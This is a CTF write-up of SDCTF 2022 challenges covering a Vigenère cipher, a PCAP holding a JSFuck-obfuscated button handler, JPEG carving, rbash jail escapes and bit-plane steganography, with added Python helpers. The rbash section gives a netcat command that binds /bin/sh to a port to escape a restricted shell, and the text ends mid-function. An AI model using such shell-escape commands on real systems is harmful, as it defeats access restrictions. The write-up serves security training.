SDCTF 2022

crypto

Vinegar

Solved by: Avantika (iamavu)

Vinegar
My friend gave me another encrypted flag...I think they hate me! I heard them yell something about “Vinegar”, but I still don’t know what they’re talking about!

Ciphertext
{wbeyrjgewcfroggpesremvxgvefyrcmnnymxhdacgnnrwprhxpuyyaupbmskjrxfopr}

Note
My friend also yelled something about “preventing plaintext attacks” and said once I’ve decrypted this, I’ll need to append sdctf to the front of it.

As the name implies, it is a Vigenère cipher. The key is unknown, so we need to recover it: the ciphertext is long enough that candidate keys can be scored against English statistics, which is what the "bruteforce" tools do. I googled for a Vigenère bruteforcer and the first tool did the trick; don't forget to prepend sdctf to the result.
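The following Python script is an added example, not part of the original writeup. It shows both attacks the challenge note alludes to: a known-plaintext recovery (the reason the predictable sdctf prefix was stripped before encryption), which derives the key from the published ciphertext/flag pair, and the ciphertext-only route that automatic solvers use, index of coincidence to estimate the period and a chi-squared fit per column to recover each key letter. The key it recovers is not stated anywhere on the page.

```python
"""Vigenere key recovery for the SDCTF 2022 "Vinegar" ciphertext.

Added example, not code from the original writeup. CT and PT are the ciphertext
and flag body published on the page; the recovered key is not stated there.
"""
from string import ascii_lowercase as ALPHA

CT = "wbeyrjgewcfroggpesremvxgvefyrcmnnymxhdacgnnrwprhxpuyyaupbmskjrxfopr"
PT = "couldntuseleetstringsinthisonesadlybutwemadeitextralongtocompensate"

# Relative frequency (percent) of each letter in English text, standard table.
ENGLISH_FREQ = {
    "a": 8.2, "b": 1.5, "c": 2.8, "d": 4.3, "e": 12.7, "f": 2.2, "g": 2.0,
    "h": 6.1, "i": 7.0, "j": 0.15, "k": 0.77, "l": 4.0, "m": 2.4, "n": 6.7,
    "o": 7.5, "p": 1.9, "q": 0.095, "r": 6.0, "s": 6.3, "t": 9.1, "u": 2.8,
    "v": 0.98, "w": 2.4, "x": 0.15, "y": 2.0, "z": 0.074,
}


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Shift every letter of `text` by the matching key letter, mod 26."""
    sign = -1 if decrypt else 1
    return "".join(
        ALPHA[(ALPHA.index(ch) + sign * ALPHA.index(key[i % len(key)])) % 26]
        for i, ch in enumerate(text)
    )


def shortest_period(stream: str) -> str:
    """Shortest prefix of `stream` that reproduces it when repeated."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def recover_key_from_crib(ct: str, crib: str, offset: int = 0) -> str:
    """Known-plaintext attack: key[i] = ct[i] - pt[i], then collapse the period.

    A crib shorter than the key only yields that many key letters, which is why
    the challenge stripped the predictable "sdctf" prefix before encrypting.
    """
    stream = "".join(
        ALPHA[(ALPHA.index(c) - ALPHA.index(p)) % 26]
        for c, p in zip(ct[offset:], crib)
    )
    return shortest_period(stream)


def index_of_coincidence(column: str) -> float:
    """Chance two letters drawn from `column` match: ~0.066 for English, ~0.038 for uniform text."""
    n = len(column)
    if n < 2:
        return 0.0
    return sum(column.count(a) * (column.count(a) - 1) for a in ALPHA) / (n * (n - 1))


def rank_key_lengths(ct: str, max_len: int = 20) -> list:
    """Ciphertext-only step 1: average IC over the columns of each candidate period, best first."""
    scores = []
    for period in range(1, max_len + 1):
        cols = [ct[i::period] for i in range(period)]
        scores.append((sum(map(index_of_coincidence, cols)) / period, period))
    return sorted(scores, reverse=True)


def best_shift(column: str) -> int:
    """Ciphertext-only step 2: the Caesar shift whose plaintext is closest to English (lowest chi-squared)."""
    best = None
    for shift in range(26):
        plain = vigenere(column, ALPHA[shift], decrypt=True)
        chi = 0.0
        for letter, pct in ENGLISH_FREQ.items():
            expected = pct / 100 * len(column)
            chi += (plain.count(letter) - expected) ** 2 / expected
        if best is None or chi < best[0]:
            best = (chi, shift)
    return best[1]


def crack_ciphertext_only(ct: str, key_len: int) -> str:
    """Solve each of the `key_len` columns as an independent Caesar cipher."""
    return "".join(ALPHA[best_shift(ct[i::key_len])] for i in range(key_len))


if __name__ == "__main__":
    key = recover_key_from_crib(CT, PT)
    print("key from crib:", key, "->", vigenere(CT, key, decrypt=True))
    print("IC ranking (score, period):", rank_key_lengths(CT)[:5])
    # 67 letters split ten ways is 6-7 letters per column, too few for the
    # statistics to be reliable; compare this guess with the crib-derived key.
    print("ciphertext-only guess:", crack_ciphertext_only(CT, len(key)))
```

With the flag known, the crib attack gives the key in one pass; with only the ciphertext, the IC ranking and the column-wise chi-squared fit are the right tools but need more text per column than this 67-character sample offers, which is why a solver that scores whole candidate keys does better here.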

FLAG :

sdctf{couldntuseleetstringsinthisonesadlybutwemadeitextralongtocompensate}

forensics

Flag Trafficker

Solved by: Taz34

We have a PCAP file, which we opened in Wireshark. Filtering on http, we get one response with a huge length.

Double-clicking it to follow the stream, we see something unusual:

The page creates a button with an onclick handler, obfuscated with JSFuck (JavaScript written using only the characters []()!+):

<button type="button"

onclick="\\[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]\][([]\[(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\]((!![]+[])\[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([\][[]]+\[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+!+[]]+(+[![]]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\][([]\[[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[
]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]\](!+[]+!+[]+!+[]+[!+[]+!+[]])+(!\[]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]\][([]\[(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\]((!![]+[])\[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([\][[]]+\[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+!+[]]+([]+[])[(![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(!![]+[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\]()[+!+[]+[!+[]+!+[]]]+((![]+[])\[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([\][[]]+\[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]
+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+([\][[]]+\[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]])[(![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\][([]\[[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[
])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]\](!+[]+!+[]+!+[]+[+!+[]])\[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[\][[]])\[+!+[]+[+[]]]+(!![]+[])[+[]]\]((!![]+[])\[+[]])[([\][(!![]+\[])[!+[]+!+[]+!+[]]+([\][[]]+\[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[\][[]])\[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]\]()+[])\[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([![]]+[\][[]])\[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]\](([\][(![]+\[])\[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]\][([]\[(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\]((!![]+[])\[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([\][[]]+\[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+!+[]]+(![]+[+[]])[([![]]+[\][[]])\[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[\][[]])\[+!+[]+[+[]]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]\]()[+!+[]+[+[]]]+![]+(![]+[+[]])\[([![]]+[\][[]])\[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[\][[]])\[+!+[]+[+[]]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]\]()[+!+[]+[+[]]])()\[([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(![]+[])[!
+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([\][[]]+\[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\]((![]+[+[]])\[([![]]+[\][[]])\[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[\][[]])\[+!+[]+[+[]]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]\]()[+!+[]+[+[]]])+\[])[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([\][[]]+\[])[+!+[]]+(!![]+[])[+[]]+([\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[\][(![]+\[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[\][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]\]()[+!+[]+[!+[]+!+[]]])())">

Click to display the flag!</button>

We simply ran it in an online HTML sandbox, and when we clicked the button, a dialog box displayed the flag.
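Clicking an attacker-supplied handler in a browser, even an online one, executes it for real; this one only pops an alert, but it could just as well have fetched a second stage. The following Python script is an added example, not part of the original writeup: it pulls the handler out of the captured HTML and evaluates only the JavaScript coercion rules JSFuck is built on (![] is false, +[] is 0, (![]+[]) is the string "false", []["flat"] stringifies to "function flat() { [native code] }"), which is enough to read the property names and strings the payload spells out; the first function call it meets raises instead of running anything. The grammar it parses is expr = unary ('+' unary)*, unary = ('!' | '+') unary | postfix, postfix = primary ('[' expr ']')*, primary = '[' expr? ']' | '(' expr ')'. The HTML snippet in the block is constructed; its handler is the opening expression of the real one.

```python
"""Static JSFuck decoder (added example, not code from the writeup): enough of
JavaScript's coercion rules to rebuild the strings a []()!+ payload spells out.
Function calls are refused, so nothing in the payload ever runs."""
import math
import re

UNDEF = object()  # JavaScript undefined; ("fn", name) stands for a native function such as []["flat"]

def to_str(v):  # JavaScript ToString for the value kinds JSFuck produces
    if isinstance(v, bool):
        return "true" if v else "false"
    if isinstance(v, list):
        return ",".join(to_str(e) for e in v)  # [] -> "", [2] -> "2"
    if isinstance(v, tuple):
        return "function %s() { [native code] }" % v[1]
    if isinstance(v, float):
        return "NaN" if math.isnan(v) else str(int(v))
    return "undefined" if v is UNDEF else str(v)

def to_num(v):  # JavaScript ToNumber: true -> 1, "" -> 0, "31" -> 31, anything else -> NaN
    if isinstance(v, (bool, int, float)):
        return int(v) if isinstance(v, bool) else v
    s = to_str(v)
    return 0 if s == "" else int(s) if s.isdigit() else math.nan

def truthy(v):
    return not (v is UNDEF or v is False or v == 0 or v == "" or (isinstance(v, float) and math.isnan(v)))

def add(a, b):  # binary +: objects become strings first; any string operand means concatenation
    a, b = [to_str(x) if isinstance(x, (list, tuple)) else x for x in (a, b)]
    return to_str(a) + to_str(b) if isinstance(a, str) or isinstance(b, str) else to_num(a) + to_num(b)

def index(obj, key):  # obj[key]: digits index arrays and strings, names resolve to native functions
    k = to_str(key)
    if k.isdigit():
        return obj[int(k)] if isinstance(obj, (list, str)) and int(k) < len(obj) else UNDEF
    if k == "constructor":
        return ("fn", {list: "Array", str: "String", bool: "Boolean", tuple: "Function"}.get(type(obj), "Number"))
    return UNDEF if k == "" else ("fn", k)  # [][[]] is undefined; []["flat"] is a function

class Parser:  # recursive descent over the four-rule grammar described in the text
    def __init__(self, src):
        self.s, self.i = re.sub(r"\s+", "", src), 0
    def peek(self):
        return self.s[self.i:self.i + 1]
    def eat(self, ch):
        if self.peek() != ch:
            raise SyntaxError("expected %r at offset %d" % (ch, self.i))
        self.i += 1
    def expr(self):
        v = self.unary()
        while self.peek() == "+":
            self.i += 1
            v = add(v, self.unary())
        return v
    def unary(self):
        op = self.peek()
        if op and op in "!+":
            self.i += 1
            return (not truthy(self.unary())) if op == "!" else to_num(self.unary())
        return self.postfix()
    def postfix(self):
        v = self.primary()
        while self.peek() == "[":
            self.i += 1
            v = index(v, self.expr())
            self.eat("]")
        if self.peek() == "(":  # a call: this is where execution would begin
            raise NotImplementedError("refusing to call %s at offset %d" % (to_str(v), self.i))
        return v
    def primary(self):  # '[' expr? ']' builds an array, '(' expr ')' groups
        if self.peek() == "[":
            self.i += 1
            if self.peek() == "]":
                self.i += 1
                return []
            v = self.expr()
            self.eat("]")
            return [v]
        self.eat("(")
        v = self.expr()
        self.eat(")")
        return v

def evaluate(src):
    return Parser(src).expr()

def refuses_call(src):  # True when decoding stops at a call instead of making it
    try:
        evaluate(src)
        return False
    except NotImplementedError:
        return True

def extract_onclick(html):  # the handler attribute, minus the markdown escape backslashes in the writeup's copy
    m = re.search(r'onclick="([^"]*)"', html)
    return m.group(1).replace("\\", "") if m else ""

# Constructed stand-in for the captured button; its handler is the opening expression of the real one.
SAMPLE_HTML = '<button type="button" onclick="[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]">Click to display the flag!</button>'
```

Run against the captured handler, the decoder reads out []["flat"]["constructor"] (the Function constructor) and the "return ..." string handed to it, then stops at the call; that is enough to see what the payload wants to run without letting it.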

Flag : sdctf{G3T_F*cK3d_W1r3SHaRK}


Susan album party

Solved by: Starry-lord

We get the file stub and notice it's a JPEG image. Since it was pretty heavy while the image looks very low-res, it was almost certain there was something hidden inside. When opened in an image editor such as GIMP, we see the first part of the flag:

This hinted at the JPEG magic bytes FFD8 (the start-of-image marker; FFD9 is the end-of-image marker). At this point I dumped the file as hex and searched for ffd8:

and found three such embedded images:

Flag: sdctf{FFD8_th3n_S0ME_s7uff_FFD9} (the O in “SOME” is a zero)
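The hex search above is easy to script. The following Python carver is an added example, not part of the original writeup: it pairs every FFD8FF start-of-image marker with the next FFD9 end-of-image marker and cuts each candidate out. The sample blob is constructed; for the challenge, point it at the stub file.

```python
"""Carve JPEG images embedded in another file by scanning for SOI/EOI markers.

Added example, not part of the original writeup. SAMPLE_BLOB is constructed
here; for the real challenge read the bytes of the "stub" file instead.
"""
SOI = b"\xff\xd8\xff"  # Start Of Image, always followed by another marker (FFE0 JFIF, FFE1 EXIF, ...)
EOI = b"\xff\xd9"      # End Of Image


def find_jpegs(data: bytes) -> list:
    """(start, end) of every candidate JPEG: each SOI paired with the next EOI after it.

    A real JPEG may embed a thumbnail JPEG in its EXIF segment, so one file can
    yield several candidates, the outer one cut short at the thumbnail's EOI;
    carve them all and inspect rather than trusting the count.
    """
    spans = []
    start = data.find(SOI)
    while start != -1:
        end = data.find(EOI, start + len(SOI))
        if end == -1:
            break
        spans.append((start, end + len(EOI)))
        start = data.find(SOI, start + 1)
    return spans


def carve(data: bytes) -> list:
    """The bytes of each candidate, in file order."""
    return [data[s:e] for s, e in find_jpegs(data)]


def write_candidates(data: bytes, prefix: str = "carved") -> list:
    """Write each candidate to prefix_N.jpg and return the names."""
    names = []
    for n, img in enumerate(carve(data)):
        name = "%s_%d.jpg" % (prefix, n)
        with open(name, "wb") as fh:
            fh.write(img)
        names.append(name)
    return names


# Constructed sample: junk, a minimal JFIF-headed image, padding, a second image.
JPEG_1 = SOI + b"\xe0" + b"JFIF" + EOI
JPEG_2 = SOI + b"\xdb" + b"\x00" + EOI
SAMPLE_BLOB = b"junk" + JPEG_1 + b"padding" + JPEG_2

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for s, e in find_jpegs(blob):
        print("JPEG candidate at offset 0x%x, %d bytes" % (s, e - s))
```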

jail

rbash warmup

Solved by: thewhiteh4t

We can use compgen to list the commands available in the restricted shell:

    compgen -c

Another way is echo with a glob, e.g. echo /usr/bin/* or echo *; echo is a shell builtin, so it works even when ls is not available.

Now the known way of escaping with nc is to get a shell on our “attacker” box, but in this challenge we are not allowed to connect to remote machines, so we are left with localhost.

Actually this is even easier:

    nc -lvp 4444 -e /bin/sh &

This binds an unrestricted /bin/sh on a local port, and now we can connect to it (nc 127.0.0.1 4444)! Note that -e needs nc.traditional or ncat; the OpenBSD netcat does not support it.


rbash yet another calculator

Solved by: thewhiteh4t

The challenge mentions that the filename has been changed this time, but it is still in the same working directory, so we can again use echo with a glob (echo *) to find the file name.

Then read it with echo as well; just google “echo read file” (the bash form is echo "$(<filename)", which needs no external command and no output redirection, so rbash allows it).

misc

Ishihara test++

Solved by: Taz34

Convert the image to PNG, open it in StegSolve and step through the colour/bit planes until the text becomes readable.
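What StegSolve does when you step through the planes is isolate one bit of one colour channel per pixel. The following Python script is an added example, not from the original writeup: it performs that extraction on a plain list of RGB tuples so it runs without Pillow, and also embeds and reads back a message in the red LSB so the effect is visible. The cover image is constructed; with Pillow you would feed it list(Image.open("ishihara.png").convert("RGB").getdata()) and the image width.

```python
"""Bit-plane extraction, the operation StegSolve performs when you step through
"Red plane 0", "Green plane 0" and so on.

Added example, not part of the original writeup. Works on a list of (R, G, B)
tuples so it needs no imaging library; the cover image below is constructed.
"""


def bit_plane(pixels: list, width: int, channel: int, bit: int) -> list:
    """Rows of 0/1 values: the chosen bit of the chosen channel for every pixel."""
    bits = [(px[channel] >> bit) & 1 for px in pixels]
    return [bits[i:i + width] for i in range(0, len(bits), width)]


def plane_to_text(plane: list) -> str:
    """ASCII-art view of a plane, the way StegSolve renders it (set bits light)."""
    return "\n".join("".join("#" if b else "." for b in row) for row in plane)


def embed_lsb(pixels: list, channel: int, message: bytes) -> list:
    """Hide `message` in the LSB of one channel, MSB-first, one bit per pixel."""
    bits = [(byte >> (7 - i)) & 1 for byte in message for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("message too long for image")
    out = []
    for i, px in enumerate(pixels):
        if i < len(bits):
            px = list(px)
            px[channel] = (px[channel] & ~1) | bits[i]
            px = tuple(px)
        out.append(px)
    return out


def extract_lsb(pixels: list, channel: int, nbytes: int) -> bytes:
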